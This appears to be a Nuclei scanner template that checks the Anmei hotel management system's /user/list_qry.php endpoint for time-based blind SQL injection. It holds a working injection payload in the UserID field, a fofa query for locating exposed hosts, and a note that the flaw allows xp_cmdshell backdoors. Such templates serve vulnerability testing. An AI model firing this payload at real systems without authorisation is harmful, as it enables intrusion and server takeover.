http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          POST /user/list_qry.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
          Content-Type: application/x-www-form-urlencoded

          UserID=0'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'Z&starttime=2023-01-01&stoptime=2023-12-31
        - |
          POST /user/list_qry.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
          Content-Type: application/x-www-form-urlencoded

          UserID=0'XOR(if(now()=sysdate()%2Csleep(8)%2C0))XOR'Z&starttime=2023-01-01&stoptime=2023-12-31
id: anmeijiudian-list_qry_php-sql-time
info:
    author: Superhero
    description: |-
        fofa: title="酒店宽带运营系统"
        安美酒店管理系统 /list_qry.php接口存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xpcmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
    name: 安美酒店管理系统 /list_qry.php接口存在sql注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/r-iq5E6LZNwAE3vARMLs0w
    severity: high
    tags: []
